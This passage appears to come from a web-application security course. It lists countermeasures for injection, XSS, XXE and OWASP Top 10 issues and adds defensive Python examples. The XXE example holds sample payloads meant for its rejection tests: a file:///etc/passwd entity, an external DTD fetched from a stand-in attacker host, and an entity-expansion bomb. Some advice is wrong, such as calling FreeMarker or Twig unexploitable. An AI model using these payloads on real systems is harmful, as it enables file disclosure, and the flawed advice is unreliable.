o Enumerate the authorized values within a conditional statement.
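An added example (not from the textbook) of the two measures the list stresses most: enumerate the authorized form of a parameter with an allowlist pattern, then pass it as one argument-vector element with no shell, so separators such as ";" or "&&" are never interpreted. The hostname pattern, the ping command and the timeout are assumptions for the demonstration.

```python
import re
import subprocess

# Allowlist pattern for a hostname-style parameter (assumed application rule):
# letters, digits, dots and hyphens only, so shell metacharacters never pass.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")


def validate_hostname(value: str) -> str:
    """Enumerate the authorized values instead of blacklisting bad characters."""
    if not HOSTNAME_RE.fullmatch(value):
        raise ValueError("rejected input: %r" % value)
    return value


def build_ping_argv(host: str) -> list:
    """Build an argument vector: each element reaches the program as exactly one argument."""
    return ["ping", "-c", "1", validate_hostname(host)]


def run_without_shell(argv: list, timeout: float = 5.0) -> str:
    """Run argv directly (shell=False, the default): no shell parses ';', '&&' or '|'.
    A timeout and check=True make blockages and failures visible instead of silent."""
    completed = subprocess.run(
        argv, capture_output=True, text=True, check=True, timeout=timeout
    )
    return completed.stdout
```

Because the shell is never involved, the separators in the test input below reach echo as literal text and are simply printed back.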
■ LDAP Injection Attacks
An LDAP injection attack is similar to an SQL injection attack: attacks on web applications
co-opt the user input to create LDAP queries. Execution of malicious LDAP queries in the
applications creates arbitrary queries that disclose information such as usernames and
passwords, thus granting attackers unauthorized access and admin privileges.
Some countermeasures against LDAP injection attacks are as follows:
o Perform type, pattern, and domain value validation on all input data.
o Make the LDAP filter as specific as possible.


o Validate and restrict the amount of data returned to the user.


o Implement tight access control on the data in the LDAP directory.
o Perform dynamic testing and source code analysis.
o Sanitize all the user-end inputs and escape any special characters.
o Avoid constructing LDAP search filters by concatenating strings.
o Use the AND filter to enforce restrictions on similar entries.
o Use LDAPS (LDAP over SSL) for encrypting and securing the communication on the
web servers.
o Establish the LDAP binding account in the environment with the least privileges
possible.
o Configure LDAP with bind authentication.
o Use SaaS-based testing services for combating LDAP injection attacks.
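As an added example (not the textbook's code), three of the measures above in Python: pattern validation of the username, escaping of the filter metacharacters defined in RFC 4515, and a specific AND filter with a restricted attribute list. The username policy and the attribute list are assumptions.

```python
import re

# Constructed username policy (assumption): short, alphanumeric with . _ -
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")

# RFC 4515 escapes for characters that carry meaning inside a filter value.
_LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}

# Restrict the data returned to the caller: never request password attributes.
RETURNED_ATTRIBUTES = ["uid", "cn", "mail"]


def validate_username(value: str) -> str:
    """Type/pattern validation: reject anything outside the allowed form up front."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("invalid username")
    return value


def escape_ldap_filter_value(value: str) -> str:
    """Escape a value for use inside a search filter (defense in depth after validation)."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter(username: str) -> str:
    """Specific AND filter: only person entries whose uid is exactly this value match."""
    return "(&(objectClass=person)(uid=%s))" % escape_ldap_filter_value(username)


def login_filter_for(raw_username: str) -> str:
    """Validate first, then build the filter; the string is never concatenated raw."""
    return build_login_filter(validate_username(raw_username))
```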
■ File Injection Attacks
Attackers use scripts to inject malicious files into the server, allowing them to exploit
vulnerable parameters and execute malicious code. Such an attack allows temporary
data theft and data manipulation, and it can provide attackers with persistent control of
the server.
Some countermeasures against file injection attacks are as follows:
o Strongly validate the user input.
o Consider implementing a chroot jail.
o PHP: Disable allow_url_fopen and allow_url_include in php.ini.
o PHP: Disable register_globals and use E_STRICT to find uninitialized variables.
o PHP: Ensure that all file and stream functions (stream_*) are carefully vetted.
o Configure a separate database for the files and file paths, along with a unique
identifier/ID for each path, to avoid MITM attacks.
o Avoid the execution of files in default directories and enable the auto-download
header option for server-side communications.
o Check for PHP wrappers such as PHP filter and PHP ZIP to prevent access to sensitive
files in the local server's file system.
o Maintain a whitelist for the allowable file types and file size limits before execution.
o Employ a WAF security layer for monitoring the file injection attacks at the server.
■ Server-Side JS Injection
o Ensure that user inputs are strictly validated on the server side before processing.


o Avoid using the eval() function to parse the user input.


o Never use commands having identical effects, such as setTimeout(), setInterval(),
and Function().
o Use JSON.parse() instead of eval() to parse the JSON input.
o Make sure to include "use strict" at the beginning of the function to enable the strict
mode inside the function scope.
o Ensure that only short alphanumeric strings are accepted as user input.
o Do not use code serialization.
■ Server-Side Include Injection

o Validate the user input and ensure that it does not include characters used in SSI
directives.
o Apply HTML encoding to the user input before executing it in the web pages.
o Ensure that directives are confined only to the web pages where they are required.
o Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to
prevent attacks.
o Implement suEXEC for the execution of pages as the file owner.
o Configure the global access.conf file using Options IncludesNOEXEC to
restrict the execution of SSI inside the directories.
■ Server-Side Template Injection

o Do not create templates from user inputs or pass user inputs as parameters into the
templates.
o Use a simple template engine such as Mustache or Python's template if the business
requirements support user-submitted templates.
o Review the template engine's documentation for hardening tips.
o Execute the template inside a sandboxed environment.
o Consider loading static template files wherever possible.
o Ensure that dynamic data are passed to a template using the template engine's
built-in functionality.
o Use predefined payloads along with in-built template expressions to examine the
server responses periodically.
o Employ highly complex and unexploitable template programming languages such as
FreeMarker, Velocity, Smarty, Twig, and Jade to develop a template.
o Ensure that the template strings and variables are never combined.
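An added example (not from the textbook) of the first and last points above, using string.Template, the simple Python template engine the list recommends: the safe version keeps the template fixed and passes user input only as data, while the unsafe version builds the template text from the input, so any placeholder the user writes is expanded against the server-side context. The context dictionary and its secret value are constructed for the demonstration.

```python
from string import Template

# Constructed server-side context; the secret stands in for anything the template can see.
CONTEXT = {"db_password": "constructed-example-secret"}


def render_greeting(user_input: str) -> str:
    """Safe: the template is fixed by the developer; user input is substituted as data.
    Substitution is single-pass, so a '$' in the input is never re-interpreted."""
    template = Template("Hello, $name!")
    return template.substitute(name=user_input)


def render_greeting_unsafe(user_input: str) -> str:
    """Unsafe: template text and user input are combined, so placeholders written by
    the user are resolved against the whole context (server-side template injection)."""
    template = Template("Hello, " + user_input + "!")
    return template.substitute(dict(CONTEXT, name=user_input))
```

string.Template has no expression syntax, so even the unsafe path cannot execute code; with an engine that evaluates expressions the same mistake is far worse, which is why the list also asks for sandboxing.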


■ Log Injection

o Pass log codes instead of messages through parameters.


o Use correct error codes and easily recognizable error messages.
o Avoid using API calls to log actions due to their visibility in browser network calls.
o Make sure to pass user IDs or publicly non-identifiable inputs as the parameters at
logging endpoints.
o Validate inputs at both the server side and the client side and sanitize and replace
the malicious characters.
o Examine the application carefully for any vulnerabilities that are used to render logs.
o Separate legitimate and fake log entries by using a prefix for every log entry with
additional metadata.
o Restrict access to physical log files.
o Control execution flow by using proper synchronization.
o Scan log injection vulnerabilities proactively with static analysis tools.
o Avoid viewing logs with tools having the ability to interpret control characters within
a file.
■ HTML Injection

o Validate all the user inputs to remove the HTML-syntax substrings from user-
supplied text.
o Check the inputs for unwanted script or HTML code such as <script></script>,
<html></html>.
o Employ security solutions that avoid false positives and detect possible injections.
o Ensure that user outputs are also encoded, examined, and validated along with user
inputs by maintaining a complete data validation process.
o Educate the developer teams along with the security teams regarding the most
prevalent HTML injection attacks and their preventive measures.
o Enable the HttpOnly flag on the server side to ensure that all the cookies generated
by the application are not available to the client user.
■ CRLF Injection

o Use any function to encode CRLF special characters and avoid using the user input in
the response headers.
o Update the version of the programming language that disallows the injection of CR
(carriage return) and LF (line feed) characters.
o Rewrite the code so that the user's content is not directly used in the HTTP stream.


o Check and remove any newline strings in the content before passing it to the HTTP
header.
o Encrypt the data that is passed to the HTTP headers to hide the CR and LF codes.
o Disable unwanted headers.
o Configure XSSUrlFilter in the web application to prevent CRLF injection attacks.
o Utilize tools such as htmlcleaner (http://htmlcleaner.sourceforge.net) to remove
script tags and defend against CRLF injection attacks.
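An added example (not the textbook's code) that serves both the Log Injection list and the CRLF Injection list above: response-header values are refused (or stripped) when they contain CR, LF or NUL, and log entries use a fixed prefix, an event code instead of a free-text message, a user id instead of raw input, and control-character neutralization so one field can never forge a new line or an extra field. The "APP" prefix, the field layout and the event-code set are assumptions.

```python
_FORBIDDEN_HEADER_CHARS = "\r\n\x00"
EVENT_CODES = {"LOGIN_OK", "LOGIN_FAIL", "LOGOUT"}  # assumed set of log codes


def safe_header_value(value: str) -> str:
    """Refuse CR, LF and NUL in anything bound for a response header (e.g. Location)."""
    if any(ch in value for ch in _FORBIDDEN_HEADER_CHARS):
        raise ValueError("control characters are not allowed in header values")
    return value


def strip_newlines(value: str) -> str:
    """Alternative when rejection is not an option: remove newline strings before
    the value is passed to the HTTP header."""
    return value.replace("\r", "").replace("\n", "")


def neutralize_for_log(value: str) -> str:
    """Escape non-printable characters and the field separator so a value cannot
    forge a new log line or an additional field."""
    out = []
    for ch in value:
        if ch == "|" or not ch.isprintable():
            code = ord(ch)
            out.append("\\x%02x" % code if code < 256 else "\\u%04x" % code)
        else:
            out.append(ch)
    return "".join(out)


def log_entry(event_code: str, user_id: str, detail: str) -> str:
    """One structured line: fixed prefix, a known event code, the user id, and one
    neutralized detail field."""
    if event_code not in EVENT_CODES:
        raise ValueError("unknown event code")
    return "APP|%s|user=%s|detail=%s" % (
        event_code,
        neutralize_for_log(user_id),
        neutralize_for_log(detail),
    )
```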
• XSS Attacks

XSS is another type of input validation attack that targets the flawed input validation
mechanism of web applications for the purpose of malicious activities. Attackers embed
a malicious script into web application input gates, which allows them to bypass the
security measures imposed by the applications.
Some countermeasures against XSS attacks are as follows:
o Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all
parameters) against a rigorous specification.
o Use testing tools extensively during the design phase to eliminate such XSS holes in
the application before it goes into use.
o Use a web application firewall to block the execution of a malicious script.
o Convert all non-alphanumeric characters into HTML character entities before
displaying the user input in search engines and forums.
o Encode the input and output and filter metacharacters in the input.
o Never trust websites that use HTTPS when it comes to XSS.
o Filtering the script output can also defeat XSS vulnerabilities by preventing them
from being transmitted to users.
o Deploy public key infrastructure (PKI) for authentication, which checks to ascertain
that the script introduced is actually authenticated.
o Implement a stringent security policy.
o Web servers, application servers, and web application environments are vulnerable
to cross-site scripting. It is difficult to identify and remove XSS flaws from web
applications. The best way to find flaws is to perform a security review of the code
and search in all the places where the input from an HTTP request comes as an
output through HTML.
o Attackers use a variety of HTML tags to transmit malicious JavaScript. Nessus,
Nikto, and other tools can help to some extent in scanning websites for these flaws.
If the scanning discovers a vulnerability in a website, it is highly likely to be
vulnerable to other attacks.


o Review the website code to defend against XSS attacks. Check the robustness of the
code by reviewing it and comparing it against exact specifications. Check the
following areas: headers, cookies, query string form fields, and hidden fields. During
the validation process, there must be no attempt to recognize the active content,
either by removing the filter or by sanitizing it.
o There are many ways to encode known filters for active content. A "positive security
policy" is highly recommended, which specifies what is allowed and what must be
removed. Negative or attack signature-based policies are difficult to maintain, as
they are incomplete.
o Input fields should be limited to a maximum size since most script attacks need
several characters to initiate.
o Implement Content Security Policy (CSP) to prevent the browser from executing XSS
attacks.
o Escape untrusted HTTP request data built on the context in the HTML output to
resolve Reflected and Stored XSS vulnerabilities.
o Employ context-sensitive encoding when altering the browser document on the
client side, which acts against the DOM-XSS.
o Use session IDs and timestamps to prevent attackers from accessing client account
information using session cookies.
o Employ automated VAPT tools during the source-code development phase of a web
application to ensure that the application is free of known vulnerabilities.
o Use browsers that are capable of in-built security filtering from the client side to
obstruct the execution of malicious scripts.
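An added example (not the textbook's code) of the context-sensitive encoding, the input size limit and the Content Security Policy header from the list above: one untrusted search string is placed in HTML body, HTML attribute and JavaScript string contexts, each through its own encoder, and the page is served under a nonce-based CSP. The page layout, the nonce length and MAX_QUERY_LEN are assumptions.

```python
import html
import json
import secrets

MAX_QUERY_LEN = 200  # limit input size (assumed policy)


def encode_html_body(value: str) -> str:
    """HTML element content: &, <, > and quotes become character entities."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """HTML attribute value: always quoted, with the same entity encoding."""
    return '"' + html.escape(value, quote=True) + '"'


def encode_js_string(value: str) -> str:
    """JavaScript string literal inside a <script>: JSON-encode (non-ASCII, including
    U+2028/U+2029, is already \\u-escaped by default), then neutralize '</' so the
    value cannot close the script element early."""
    return json.dumps(value).replace("</", "<\\/")


def new_nonce() -> str:
    """Fresh per-response nonce for the CSP and the page's own script tag."""
    return secrets.token_urlsafe(16)


def csp_header(nonce: str) -> tuple:
    """Content-Security-Policy: only scripts carrying this nonce run, so a script
    injected into the page without the nonce is refused by the browser."""
    policy = (
        "default-src 'self'; script-src 'nonce-%s'; object-src 'none'; base-uri 'none'"
        % nonce
    )
    return ("Content-Security-Policy", policy)


def render_search_page(query: str, nonce: str) -> str:
    """The same untrusted value in three output contexts, each with its own encoder."""
    if len(query) > MAX_QUERY_LEN:
        raise ValueError("query too long")
    return (
        "<p>Results for " + encode_html_body(query) + "</p>\n"
        '<input name="q" value=' + encode_html_attr(query) + ">\n"
        '<script nonce="' + nonce + '">var q = ' + encode_js_string(query) + ";</script>"
    )
```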


Web Application Attack Countermeasures

■ Broken Access Control
o Perform access-control checks before redirecting the authorized user to the requested resource
o Avoid using insecure IDs to prevent attackers from guessing them
o Provide a session timeout mechanism
o Limit file permissions to authorized users to prevent misuse
■ Cryptographic Failures/Sensitive Data Exposure
o Do not create or use weak cryptographic algorithms
o Generate encryption keys offline and store them securely
o Ensure that encrypted data stored on the disk is not easy to decrypt
■ Insecure Design
o Implement a threat modelling system to recognize potential threats before they are exploited
o Implement a secure development life cycle for the development of applications according to security standards
o Perform application reliability checks periodically at each stage of development
■ Security Misconfiguration
o Configure all security mechanisms and disable all unused services
o Setup roles, permissions, and accounts and disable all default accounts or change their default passwords
o Non-SSL requests to web pages should be redirected to the SSL page

Web Application Attack Countermeasures (Cont'd)

■ XML External Entity
o Avoid processing XML input containing a reference to an external entity by a weakly configured XML parser
o The XML unmarshaller should be configured securely
o Parse the document with a securely configured parser
o Configure the XML processor to use local static DTD and disable any declared DTD included in an XML document
■ Vulnerable and Outdated Components
o Regularly check the versions of both client-side and server-side components as well as their dependencies
o Continuously monitor sources such as the National Vulnerability Database (NVD) for vulnerabilities in the components used
o Apply security patches regularly
o Scan the components with security scanners frequently
o Enforce security policies and best practices for component use
■ Identification and Authentication Failures
o Use SSL for authenticated parts of the application
o Verify whether all the users' identities and credentials are stored in a hashed form
o Never submit session data as part of a GET or POST
o Apply pass phrasing with at least five random words
o Use a secure platform session manager to generate long, random session identifiers


Web Application Attack Countermeasures (Cont'd)

■ Software and Data Integrity Failures
o Enforce digital signatures to test the integrity of the source and data
o Always use trusted repositories such as npm or Maven for libraries and dependencies
o Check the software components for known vulnerabilities using supply-chain security tools such as OWASP Dependency Check
■ Insecure Deserialization
o Validate untrusted input that is to be serialized to ensure that serialized data contain only trusted classes
o The deserialization of trusted data must cross a trust boundary
o Developers must redo the architecture of their applications
o Avoid serialization for security-sensitive classes
■ Security Logging and Monitoring Failures
o Define the scope of assets covered in log monitoring to include business-critical areas
o Setup a minimum baseline for logging and ensure that it is followed for all assets
o Ensure that logs are logged with user context so that they are traceable to specific users
■ Server-Side Request Forgery Attacks
o Ensure URL stability for the prevention of DNS rebinding and TOCTOU attacks
o Implement the segregation of access functionality for the remote resources into distinct networks
o Enable the policy of "deny by default"

Web Application Attack Countermeasures (Cont'd)

■ Directory Traversal
o Define access rights to the protected areas of the website
o Apply checks/hotfixes that prevent the exploitation of vulnerabilities such as Unicode to affect the directory traversal
o Web servers should be regularly updated with security patches
■ Unvalidated Redirects and Forwards
o Avoid using redirects and forwards
o If destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user
■ Watering Hole Attack
o Regularly apply software patches to remove any vulnerabilities
o Monitor network traffic
o Secure the DNS server to prevent attackers from redirecting the site
o Analyze user behavior
o Inspect popular websites


Web Application Attack Countermeasures (Cont'd)

■ Cross-Site Request Forgery
o Logoff immediately after using a web application and clear the history
o Do not allow your browser and websites to save login details
o Check the HTTP referrer header and when processing a POST, ignore URL parameters
■ Cookie/Session Poisoning
o Do not store plain text or weakly encrypted password in a cookie
o Implement timeout limits for cookies
o The authentication credentials of any cookie should be associated with an IP address
o Make logout functions available
■ Web Service Attack
o Configure WSDL Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages
o Use document-centric authentication credentials that use SAML
o Use multiple security credentials such as X.509 Cert, SAML assertions and WS-Security
o Deploy web services-capable firewalls that include SOAP and ISAPI level filtering
o Configure firewalls/IDS systems for anomaly and signature detection for web services

Web Application Attack Countermeasures (Cont'd)

■ Clickjacking Attack
o Use a server-side method such as X-Frame-Options header and use its options DENY, SAMEORIGIN, ALLOW-FROM URI
o Never use client-side methods such as Framebusting or Framebreaking
o Use the Content-Security-Policy (CSP) HTTP header
■ JavaScript Hijacking
o Use .innerText rather than .innerHTML in JavaScript to encode the text
o Avoid using the eval function
o Use the encoding library to safeguard the attributes and data elements
o Make sure to return JSON with an object externally
■ Username Enumeration
o Ensure that inputs that include user identifiers produce outputs containing only generic error messages
o Use randomly generated data for usernames instead of sequential numbers
o Use CAPTCHA for all pages that accept input to prevent automatic data collection
■ Attack on Password Reset Mechanism
o Perform proper validation of random tokens and email links
o Ensure all password reset URLs are used only once and set an expiry time limit
o Avoid automated requests through programs and enforce human checks using the CAPTCHA

Web Application Attack Countermeasures


■ Broken Access Control
o Perform access-control checks before redirecting the authorized user to the
requested resource.
o Avoid using insecure IDs to prevent the attacker from guessing them.


o Provide a session timeout mechanism.


o Limit file permissions to authorized users to prevent misuse.
o Avoid client-side caching mechanisms.
o Remove session tokens on the server side on user logout.
o Ensure that minimum privileges are assigned to users to perform only essential
actions.
o Enforce access control mechanisms once and re-use them throughout the
application.
o Implement deny by default, except for public resources.
o Enforce model access control that registers ownership instead of allowing the user
to modify the record.
o Perform regular audits and tests on the access controls to discover flaws and ensure
that the controls are working as expected.
o Ensure that only server-side authentication is trusted because the same controls are
implemented for all the applications, users, and services.
o Enable role-based access control (RBAC) to enhance compliance.
o Ensure that the web roots do not contain any metadata or backup files.
o Invalidate stateful session identifiers on the server after the user logs out.
o Restrict the use of the cross-origin resource sharing (CORS) protocol.
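An added example (not the textbook's code) of several points in the list above in Python: one reusable authorization check with deny by default, ownership registered on the model rather than supplied by the client, the access check performed before the resource is returned, and a session timeout; a missing record and a forbidden record produce the same result so insecure IDs cannot be probed. The record store, roles, path layout and 15-minute timeout are constructed for the demonstration.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class User:
    id: int
    roles: frozenset


@dataclass(frozen=True)
class Record:
    id: int
    owner_id: int  # ownership registered on the model, never taken from the request
    body: str


# Constructed sample data (not from the page).
RECORDS = {
    1: Record(1, owner_id=10, body="alice's note"),
    2: Record(2, owner_id=20, body="bob's note"),
}
PUBLIC_PATHS = frozenset({"/", "/login"})
SESSION_TTL_SECONDS = 15 * 60  # assumed session timeout policy


def session_is_valid(issued_at: float, now: float) -> bool:
    """Session timeout mechanism: an expired session counts as unauthenticated."""
    return 0 <= now - issued_at <= SESSION_TTL_SECONDS


def authorize_path(user: Optional[User], path: str) -> bool:
    """Single, reusable check, deny by default: only public paths are open, and only
    explicitly mapped areas are allowed for authenticated users."""
    if path in PUBLIC_PATHS:
        return True
    if user is None:
        return False
    if path.startswith("/admin/"):
        return "admin" in user.roles
    if path.startswith("/records/"):
        return True  # per-object ownership is checked in get_record()
    return False


def can_access_record(user: User, record: Record) -> bool:
    """Model-level rule: owners and admins only."""
    return record.owner_id == user.id or "admin" in user.roles


def get_record(user: Optional[User], record_id: int) -> Optional[Record]:
    """Check access before handing out (or redirecting to) the resource. Missing and
    forbidden records look identical, so record IDs cannot be enumerated."""
    if user is None:
        return None
    record = RECORDS.get(record_id)
    if record is None or not can_access_record(user, record):
        return None
    return record
```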
■ Cryptographic Failures/Sensitive Data Exposure

Many web applications do not properly protect sensitive data such as credit card
numbers, SSNs, and authentication credentials with appropriate encryption or hashing.
Attackers may steal or modify such weakly protected data to conduct identity theft,
credit card fraud, or other crimes.
Some countermeasures against cryptographic failures/sensitive data exposure attacks
are as follows:
o Do not create or use weak cryptographic algorithms.
o Generate encryption keys offline and store them securely.
o Ensure that encrypted data stored on the disk is not easy to decrypt.
o Use AES encryption for stored data and use TLS with HSTS (HTTP Strict Transport
Security) for incoming traffic.
o Classify the data processed, stored, or transmitted by an application and apply
controls accordingly.
o Use PCI DSS compliant tokenization or truncation to remove the data soon after its
requirement.


o Use proper key management and ensure that all the keys are in place.
o Encrypt all the data in transit using TLS with Perfect Forward Secrecy (PFS) ciphers.
o Disable caching techniques for requests that contain sensitive information.
o Avoid the storage of unused vital data on the storage space to avoid exposure.
o Employ a well-crafted distinct algorithm for the security of password storage.
o Disable the auto-filling option for highly sensitive data forms.
o Employ WAF security for an additional layer of protection along with data masking
and customized rules for confidential data access at the client side.
o Avoid the use of APIs that call for excessive data exposure by using global JSON
payloads.
o Use salted hashing functions such as PBKDF2 and Argon2 to store passwords.
o Use IVs and CSPRNG only when they are required to be implemented.
o Avoid using outdated hashing functions and padding techniques such as MD5, SHA-1,
PKCS v1, and PKCS v1.5.
o Use authenticated encryption techniques while encrypting the stored data to
achieve both confidentiality and data integrity.
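An added example (not the textbook's code) of salted password storage with PBKDF2, one of the two functions the list names, using only Python's standard library: a per-user random salt, a stored work factor, constant-time comparison on verification, rejection of records in any other format (so an old unsalted MD5 value is never accepted), and a rehash check for records below current policy. The storage format and the 600,000-iteration default are assumptions; tune the work factor to the server.

```python
import base64
import hashlib
import hmac
import os
from typing import Optional

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000  # assumed work factor; measure on the target hardware


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = ITERATIONS) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as a self-describing string:
    algorithm$iterations$base64(salt)$base64(derived key)."""
    salt = salt or os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return "$".join([
        ALGORITHM,
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(derived).decode("ascii"),
    ])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algorithm, iterations, salt_b64, derived_b64 = stored.split("$")
    except ValueError:
        return False  # malformed or legacy record (e.g. a bare MD5 hex digest)
    if algorithm != ALGORITHM:
        return False  # outdated formats are never accepted, only migrated
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(derived_b64)
    derived = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, int(iterations), dklen=len(expected)
    )
    return hmac.compare_digest(derived, expected)


def needs_rehash(stored: str) -> bool:
    """True when the record uses another algorithm or a lower work factor than policy,
    so it can be re-hashed transparently at the next successful login."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM:
        return True
    try:
        return int(parts[1]) < ITERATIONS
    except ValueError:
        return True
```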
■ Insecure Design
o Threat modelling:
• Implement a threat modeling system to detect potential threats before they are
exploited. A threat modeling system scrutinizes the security and privacy
requirements of an application during its development.

• Perform periodic assessments for every module and feature to be added to the
application.

• Design tests for flow validation and verification to defend against the listed
threats.
o Secure design:
• Implement secure design that can help in maintaining proper security in the
application through automated evaluation and testing for potential threats.

• Ensure that the application has been verified for errors. The estimations should
be analyzed and recorded . Based on the recorded estimations, appropriate
measures should be implemented.
o Secure development life cycle:
• Implement a secure development life cycle, which helps in meeting the client
requirements and developing applications according to security standards.


• Ensure that the development and security teams maintain healthy
communication during the development of the application to implement
security- and privacy-related controls for the application.
Some additional countermeasures against insecure design issues are as follows:
o Perform application reliability checks periodically at each stage of development.
o Employ limited privileged resource access depending on the application or service.
o Differentiate the list of user accessibility scenarios into two categories based on the
use and misuse cases.
o Implement security controls layer-wise starting from the network to the system.
o Categorize the application users based on their authorization and access levels.
o Perform attack vector identification using all the security and access controls and
business risk profiling.
• Security Misconfiguration

Security misconfiguration makes web applications potentially vulnerable and may
give attackers access to them as well as to files and other application-controlling
functions. Insufficient transport layer protection allows attackers to obtain
unauthorized access to sensitive information and to perform attacks such as account
theft, phishing, and compromise of admin accounts. Encrypt all communication
between the website and the client to prevent attacks due to insufficient transport
layer protection.
Some countermeasures against security misconfiguration attacks are as follows:
o Configure all security mechanisms and disable all unused services.
o Set up roles, permissions, and accounts; disable all default accounts or change
their default passwords.
o Scan for the latest security vulnerabilities and apply the latest security patches.
o Redirect plain-HTTP (non-SSL/TLS) requests to the HTTPS page and send an HTTP
Strict-Transport-Security (HSTS) header so that browsers do not retry over HTTP.
o Set the 'secure' flag on all sensitive cookies.
o Configure the SSL/TLS provider to support only strong protocol versions and cipher
suites.
o Ensure that the certificate is valid and not expired, and that it matches all domains
used by the site.
o Backend and other connections should also use SSL/TLS or other encryption
technologies.
o Use different credentials for each phase, such as development, testing, and
production.
o Do not add unnecessary features, components, samples, and frameworks to the
application.

o Segment the application architecture to provide individual security for each
component and tenant.
o Implement an automated process for checking configuration and settings
effectiveness in all phases.
■ XML External Entity

o Do not let a weakly configured XML parser process XML input that references an
external entity.
o Configure the XML unmarshaller securely.
o Parse the document with a securely configured parser.
o Configure the XML processor to use a local static DTD and disable any DTD
declared inside an XML document.
o Implement whitelisting, input validation, sanitization, and filtering to keep hostile
data out of XML documents.
o Update and patch XML processors and libraries to the latest versions.
o Ensure that the XML/XSL file upload function validates the XML against an XSD
schema.
o Employ security tools such as API security gateways, interactive application security
testing (IAST) tools, and web application firewalls (WAFs) to identify and stop XXE
attacks.
o Monitor the execution flow of the application by placing checkpoints in the source
code that detect and block unexpected XML processing.
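The two-pass parser below is an added example (written for this edit, not code from the course) of the XXE countermeasures above, in Python: a bare expat pass whose handlers refuse any DOCTYPE, entity declaration, or external reference, followed by the normal tree build only for documents that passed. The sample documents are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when the input carries a DTD, an entity declaration, or an external reference."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Any DOCTYPE is refused: the application uses its own local, static DTD
    # if it needs one, never one declared inside the document.
    raise UnsafeXML(f"DOCTYPE not allowed (root {name!r}, system id {sysid!r})")


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    # Blocks SYSTEM/PUBLIC entities (XXE) and internal ones alike; the latter
    # are what entity-expansion denial of service ("billion laughs") relies on.
    raise UnsafeXML(f"entity declaration not allowed: {name!r}")


def _reject_external_ref(context, base, sysid, pubid):
    raise UnsafeXML(f"external entity reference blocked: {sysid!r}")


def check_xml(data: bytes) -> None:
    """First pass: a bare expat parser whose only job is to refuse DTD constructs."""
    parser = expat.ParserCreate()
    # Never process parameter entities, so no external DTD is ever fetched.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity
    parser.ExternalEntityRefHandler = _reject_external_ref
    parser.Parse(data, True)


def parse_xml_safely(data: bytes) -> ET.Element:
    """Second pass: build the element tree only for input that passed check_xml()."""
    check_xml(data)
    return ET.fromstring(data)


# Constructed inputs for this example (not from the page).
BENIGN = b"<order><item sku='A1'>2</item></order>"
XXE = (b'<?xml version="1.0"?>'
       b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b"<order>&xxe;</order>")
EXTERNAL_DTD = b'<!DOCTYPE order SYSTEM "http://attacker.invalid/evil.dtd"><order/>'
LAUGHS = (b'<!DOCTYPE lolz [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
          b"<order>&b;</order>")


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the document."""
    try:
        parse_xml_safely(data)
    except UnsafeXML:
        return True
    return False


if __name__ == "__main__":
    print(parse_xml_safely(BENIGN).find("item").text)            # 2
    print([is_rejected(d) for d in (XXE, EXTERNAL_DTD, LAUGHS)])  # [True, True, True]
```

Rejecting every DOCTYPE is deliberately coarser than "disable external entities": it also removes internal-entity expansion attacks, and a document that legitimately needs a DTD should be validated against the application's own local copy rather than one it carries with it.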
■ Vulnerable and Outdated Components/Using Components with Known Vulnerabilities

o Regularly check the versions of both client-side and server-side components as well
as their dependencies.
o Continuously monitor sources such as the National Vulnerability Database (NVD) for
vulnerabilities in the components used.
o Apply security patches regularly.
o Scan the components with security scanners frequently.
o Enforce security policies and best practices for component use.
o Review all dependencies, including transitive dependencies, and ensure that they
are not vulnerable.
o Maintain an up-to-date inventory of the versions of both client-side and server-side
components.
o Obtain components from official sources and accept only signed packages.
o Use software composition analysis (SCA) to inspect source code and monitor
open-source vulnerabilities and license restrictions.

o Check for updates to subcomponents along with the main components.
o Wrap the required components in security wrappers that shield their vulnerable
aspects.
o Check for unnecessary dependencies, components, and files and remove them.
• Identification and Authentication Failures/Broken Authentication and Session
Management
Flaws in authentication and session management functions allow attackers to obtain
passwords, keys, and session tokens, or to exploit other implementation vulnerabilities
to take over other users' accounts.
Some applications bind a session to the client IP address by issuing a validation cookie
that carries a cryptographic token tying the session token to the IP address it was
issued for. In such deployments, an attacker who has stolen the session token must
also spoof the target user's IP address to replay it. IP binding is therefore a mitigation
rather than a complete defense, and it breaks for users whose address changes.
Some countermeasures against broken authentication and session management attacks
are as follows:
o Use SSL/TLS for all authenticated parts of the application.
o Verify that all user credentials are stored in hashed form.
o Never carry session identifiers in URLs (GET parameters) or in form fields; transmit
them only in cookies with the Secure and HttpOnly flags set.
o Allow passphrases of at least five random words.
o Limit login attempts and lock the account for a specific period after a certain
number of failed attempts.
o Use a secure platform session manager to generate long, random session identifiers.
o Implement multi-factor authentication to defeat guessing, credential stuffing, and
brute forcing.
